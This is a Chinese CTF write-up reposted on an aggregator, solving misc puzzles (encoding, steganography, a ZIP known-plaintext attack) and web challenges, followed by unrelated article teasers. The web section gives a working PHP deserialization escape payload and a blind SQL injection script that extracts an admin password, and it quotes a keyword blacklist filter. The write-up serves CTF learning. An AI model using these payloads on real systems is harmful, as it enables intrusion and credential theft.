2023 某行业-CTF

news2024/12/23 17:17:04

文章目录

      • misc
        • misc1
        • misc2
        • misc3
        • misc4
      • Web
        • Web1
        • Web2
        • Web3
        • Web5

misc

misc1

%26%2365%3B%26%2376%3B%26%2390%3B%26%23107%3B%26%23121%3B%26%2389%3B%26%2377%3B%26%2366%3B%26%2390%3B%26%2351%3B%26%2355%3B%26%23120%3B%26%23102%3B%26%23119%3B%26%2369%3B%26%2371%3B%26%23105%3B%26%23121%3B%26%2357%3B%26%2367%3B%26%2399%3B%26%23101%3B%26%23106%3B%26%23102%3B%26%23100%3B%26%23122%3B%26%2386%3B%26%2384%3B%26%23103%3B%26%23111%3B%26%23102%3B%26%2387%3B%26%23116%3B

urlDecode->htmlDecode->base58
在这里插入图片描述
在这里插入图片描述

misc2

1张png图片,binwalk分析并分离出mp3文件以及压缩包
在这里插入图片描述
用audacity打开mp3文件,查看声道,发现最后面存在一段摩斯电码

在这里插入图片描述
将其取出来

 -.. ....- ...-- ----. -.... ...-- . ----. ..--- -... ----- .---- ..--- .- .- -...

在这里插入图片描述
测试一下,是16的md5值在这里插入图片描述
解密为:n1ce_try

使用n1ce_try作为压缩包密码,得到flag.png
获取flag如下:
在这里插入图片描述
flag{Angels_watch_over_you}

misc3

在这里插入图片描述
存在零宽字符,尝试解密
在这里插入图片描述
得到提示信息

Holly,I know there is a difference between upper and lower case of "angelcup" ,like a-aa n-nn g-gg e-ee l-ll and so on...
Wish U find~

根据提示信息,将angelcup中的出现的字母换为单个字母即可

import base64
data = '50x.html中的base64字符串'
lis = ["AA", "NN", "GG", "LL", "EE", "CC", "UU", "PP"]
for i in lis:
    data = data.replace(i, i[0])
with open("flag.png", "wb") as f:
    f.write(base64.b64decode(data))

在这里插入图片描述

misc4

在这里插入图片描述
导出HTTP对象,得到tmp.zip以及几张png图片
在这里插入图片描述
根据压缩方法及加密算法,尝试明文攻击
在这里插入图片描述
获取密钥: 5b6eeca3 254ebbe5 7719424d
利用得到的密钥k生成一个新的压缩包并且设定密码
在这里插入图片描述
解压得到压缩包中的内容,接着将PPT改为ZIP后缀,在\ppt\embeddings下面的Workbook1.xlsx找到flag
在这里插入图片描述
flag{tHI5_f1A9_I5_5o_hid3_Bu7_you_f1nD_i7}

Web

Web1

根据题目信息提示 :信息收集直接扫描网站,发现存在www.zip解压压缩包,共计两个文件 index.php以及f1ooog.txt我们直接访问f1ooog.txt即可得到flag
在这里插入图片描述

Web2

<?php
  error_reporting(0);
function filter($name)
{
  $safe = array(
    "flag",
    "php"
  );
  $name = str_replace($safe, "hack", $name);
  return $name;
}
class test
{
  var $user;
  var $pass = 'daydream';
  function __construct($user)
  {
    $this->user = $user;
  }
}
if (isset($_GET['p'])) {
  $param   = $_GET['p'];
  $param   = serialize(new test($param));
  $profile = unserialize(filter($param));
  if ($profile->pass == 'escaping') {
    echo file_get_contents("flag.php");
  }
} else {
  highlight_file(__FILE__);
}
?>

反序列化字符串逃逸,可参考我另一篇文章:PHP反序列化字符串溢出
构造payload:

p=phpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphp";s:4:"pass";s:8:"escaping";}

在这里插入图片描述
flag{the_king_of_ser_hiter!}

Web3

在这里插入图片描述
根据题目要求编写脚本即可:

import requests,re,time
session=requests.Session()
for i in range(20):
	url = "http://111.74.9.131:10085/"
	req = session.get(url)
	print(req.text)
	num = re.findall("<div>(.*?)</div>",req.text)
	print(num)
	num = "".join(num).split("=")
	#print(num)
	jieguo = eval(num[0])
	answer=''
	if jieguo == int(num[1]):
		answer="true"
	else:
		answer="false"
	print(answer)
	time.sleep(1)
	x2 = session.post(url, data={"answer":answer}, verify=False)
	print(x2.text)

在这里插入图片描述

Web5

swp源码泄露

<?php
//   error_reporting(0);
  $dbhost = "db";
  $dbuser = "root";
  $dbpass = "root";
  $db = "ctf";
  $conn = mysqli_connect($dbhost,$dbuser,$dbpass,$db);
  mysqli_set_charset($conn,"utf8");

  /* sql

     create  table `admin` (
        `id` int(10) not null primary key auto_increment,
        `user` varchar(50) not null ,
        `pass` varchar(50) not null
     );
  */
function   filter($str){
      $filterlist = "/user|pass|where|case|when|like|regexp|into|limit|=|for|;|\(|\)/";
      if(preg_match($filterlist,strtolower($str))){
        die("hacker!");
      }
      return $str;
  }
$username = isset($_POST['user'])?filter($_POST['user']):die("please input username!");
$password = isset($_POST['pass'])?filter($_POST['pass']):die("please input password!");
$sql = "select * from admin where  user = '$username' and pass = '$password' ";
$res = $conn -> query($sql);

if($res->num_rows>0){
  $row = $res -> fetch_assoc();
  if($row['id']){
     echo $row['user'];
  }
}else{
   echo "keep on !";
}
/*
   提交的flag格式为flag{小写字母数字组合}
 */
?>

在这里插入图片描述
注入,根据提供的源码提示,猜测flag是admin密码
编写注入脚本:

import requests  
  
def makeStr(begin,end):  
	str=""  
	for i in range(begin,end):
		str+=chr(i)
	return str  
def getPassword():
	url="http://111.74.9.131:18001/index.php"
	testStr = makeStr(48,127)
	payload = "admin' union distinct select -1,2,binary 0x{hex} order by 3 desc, 1 DESC#"
	flag = ""
	for _ in range(32):
		for i in testStr:
			data = {"user":payload.format(hex=(flag+i).encode().hex()),"pass":'1'}
			res = requests.post(url,data)
			#print(res.text)
			if "admin" not in res.text:
				flag= flag+chr(ord(i)-1)
				print("flag:"+flag)
				break
			else:
				pass
  
if __name__== '__main__':
	getPassword()

在这里插入图片描述
flag{4e9b954bc4bd3cd5ba6ea9335fbe4b41}

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/615280.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Python从入门到精通_Day_1_Python的学习路线整理

写在最前&#xff1a; 为什么开这个专栏&#xff1a; 之前我做过一个专栏&#xff0c;专门介绍Python爬虫技术&#xff0c;这一专栏收获了很多朋友们的点赞收藏和关注。但是在爬虫技术专栏中&#xff0c;对于Python语言本身的讲解并不是很细致&#xff0c;由于Python在爬虫、数…

【Unity XCharts - 01】XCharts图表库简介

XCharts 图表库简介 1.概述2.官方资源简介2.1 官网介绍2.2 本体源码资源2.3 Unity .unitypackage 资源包2.4 Demo代码资源 ❤️ 打不开地址、下载慢的话童鞋可以在我的资源中下载 3.6.0 版本相关的资源。❤️ → 开源Unity图表库&#xff1a;XCharts 3.6.0 ← 1.概述 XCharts …

windows物理机如何迁移到VMware集群里简单教程

前言 快速将本地和远程物理机转换为虚拟机&#xff0c;而无需停机。同时转换可实现大规模虚拟化实施。提供对源物理机。 VMware和Microsoft 虚拟机格式以及某些第三方磁盘映像格式的广泛支持。 它可以自动从物理机&#xff08;运行Windows和Linux&#xff09;和从其他虚拟机格…

语音转文字怎么转?教你三个转换的方法

录音转文字电脑软件哪个好&#xff1f;分享三款好用的录音转文字工具 一分钟告诉你录音转文字电脑软件哪个好 录音转文字电脑软件哪个好&#xff1f;这几款把语音转成文字的软件推荐给你 如何语音转文字&#xff1f;三款好用语音转文字的软件推荐 语音转文字怎么转&#xf…

智慧社区物业

智慧社区跟物业有什么关系呢&#xff1f; 随着智能化科技的快速发展&#xff0c;智慧社区逐渐成为现代城市的新宠。智慧社区代表着社区信息化和智能化的水平&#xff0c;它的出现彻底改变了传统社区的管理形式。而在智慧社区中&#xff0c;物业管理是其中最为重要的环节之一&a…

【软件技术基础】C#调用NPOI插件对EXCEL进行处理

文章目录 前言一、处理界面二、按钮处理代码0、公共变量1、btnSelectFolder_Click中的代码2、btnOneKey_Click中的代码3、btnImport_Click中的代码4、btnCheck_Click中的代码5、btnProces_Click中的代码6、btnExpert_Click中的代码 三、公共部分函数总结 前言 NPOI插件进行EXC…

如何通过知识星球粉丝变现年入100万?

使用知识星球年入100万的话&#xff0c;那么你的社群收费必须超过125万&#xff0c;因为星球会有20%的手续费。 年入100万并不是一笔小数目&#xff0c;如果要达成这个目标&#xff0c;按照每个人付费100元计算&#xff0c;那么需要1万个付费用户&#xff0c;平均每个月就需要9…

Spark RDD持久化机制

文章目录 一、RDD持久化&#xff08;一&#xff09;引入持久化的必要性&#xff08;二&#xff09;案例演示持久化操作1、RDD的依赖关系图2、不采用持久化操作3、采用持久化操作 二、存储级别&#xff08;一&#xff09;持久化方法的参数&#xff08;二&#xff09;Spark RDD存…

最优化理论-KKT定理的推导与实现

目录 一、引言 二、最优化问题的基本概念 三、KKT条件的引入 1. 梯度条件 2. 原始可行性条件 3. 对偶可行性条件 四、KKT定理的表述 五、KKT定理的证明 1. 构造拉格朗日函数 2. 构造拉格朗日对偶函数 3. 推导KKT条件 4. 解释KKT条件 六、KKT定理的应用 七、总结 …

Python数据攻略-Pandas常用数据操作

大家好&#xff0c;我是Mr数据杨。今天我将带领各位走进Python的奇妙世界&#xff0c;就像步入三国演义那样热闹且复杂的战争年代。这里&#xff0c;数据就像那些智勇双全的武将和策士&#xff0c;我们要学习如何访问和修改它们&#xff0c;就如同诸葛亮那样掌控战局。 先来理…

1+X 大数据应用开发(Java)理论题库(中级题4)

文章目录 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950 1 <ALL表示小于最小 2 大于ANY表示大于最小值 3 LEFT OUTER JOIN 等同于LEFT JOIN 4 5 6 substr(string string,num start,num length); string为字符串&#x…

1160万美元!美国匹兹堡大学批准贷款建设量子信息核心WPQIC

​ 宾夕法尼亚州西部量子信息中心的首任主任Michael Hatridge教授展示量子信息科学和工程的技术实践&#xff08;图片来源&#xff1a;网络&#xff09; 量子物理学是植根于计算机、网络和传感器的有形世界。为了开创量子技术的新时代&#xff0c;研究人员需要可专用的定制化设…

Linux系统编程学习 NO.6 ——yum、Linux生态、vim的介绍

文章目录 1.Linux的安装软件的方式2.Linux的软件生态2.1.软件生态的概念2.2.Linux的软件生态 3.Linux生态4.yum安装软件4.1.验证网络4.2.使用yum安装lrzsz4.2.1.什么是lrzsz4.2.2.安装lrzsz 4.3.yum是如何找到官方yum源安装的软件呢&#xff1f;4.4.简单介绍扩展yum源4.5.关于y…

Mysql进阶【2】论述锁机制,SQL加锁情况

1.MySQL 的锁机制 1.1按粒度分有三种&#xff1a; 全局锁&#xff1a;核心服务层实现&#xff0c;锁住数据库&#xff0c;full table with read lock;表级锁&#xff1a;核心服务层实现&#xff0c;锁住数据库中的某张表 加表级读锁&#xff1a;本事务不能读取其他未加锁的表…

大数据存储与处理技术探索:Hadoop HDFS与Amazon S3的无尽可能性【上进小菜猪大数据】

上进小菜猪&#xff0c;沈工大软件工程专业&#xff0c;爱好敲代码&#xff0c;持续输出干货。 大数据时代带来了数据规模的爆炸性增长&#xff0c;对于高效存储和处理海量数据的需求也日益迫切。本文将探索两种重要的大数据存储与处理技术&#xff1a;Hadoop HDFS和Amazon S3…

Sqoop ---- Sqoop一些常用命令及参数

Sqoop ---- Sqoop一些常用命令及参数 1. 常用命令列举2. 命令&参数详解1. 公用参数&#xff1a;数据库连接2. 公用参数&#xff1a;import3. 公用参数&#xff1a;export4. 公用参数&#xff1a;hive5. 命令&参数&#xff1a;import6. 命令&参数&#xff1a;export…

设计模式(行为型模式)之:Template Method(模板方法)

文章目录 简介动机定义 早绑定代码晚绑定 模板设计模式对比分析总结 简介 该篇文章内容及思想出自 张建忠《设计模式》、GOF: 《设计模式》 定义一个操作中算法的骨架&#xff0c;而将一些操作延迟到子类中。TemplateMethod使得子类可以不改变一个算法的结构&#xff0c;即可重…

智能监控和汽车领域中的网络边缘嵌入式视觉最佳选择——低功耗ECP5 FPGA LFE5U-25F-8BG256I 莱迪思深力科

莱迪思深力科LFE5U-25F-8BG256I&#xff0c;属于ECP5系列。它拥有24,300个LUT&#xff08;Look-Up Table&#xff09;&#xff0c;可编程逻辑块&#xff0c;是一款高性能的可编程逻辑器件&#xff0c;具有高性能、灵活性和可编程性的FPGA芯片&#xff0c;适用于多个领域的高性能…

公众号开发小程序,为品牌拓展更广阔的市场!

公众号开发小程序是指在微信公众号平台上开发出一种类似于手机App的轻量级应用&#xff0c;能够给用户提供更加便捷、快速、个性化的服务和体验。 相比于传统的应用&#xff0c;公众号开发小程序有如下优势&#xff1a; 1、提升用户体验&#xff1a;相比于网页应用&#xff0c…

边缘云风口正酣,边缘一体化服务是竞争关键

连接世界从边缘开始&#xff0c; 重新定义公有云的未来 【全球云观察 &#xff5c; 热点关注】公有云已经进入白热化竞争阶段&#xff0c;从当初的云资源竞争&#xff0c;到当下更细分的云服务竞争&#xff0c;随着云计算服务市场继续蓬勃发展&#xff0c;正在催生出多样化的非…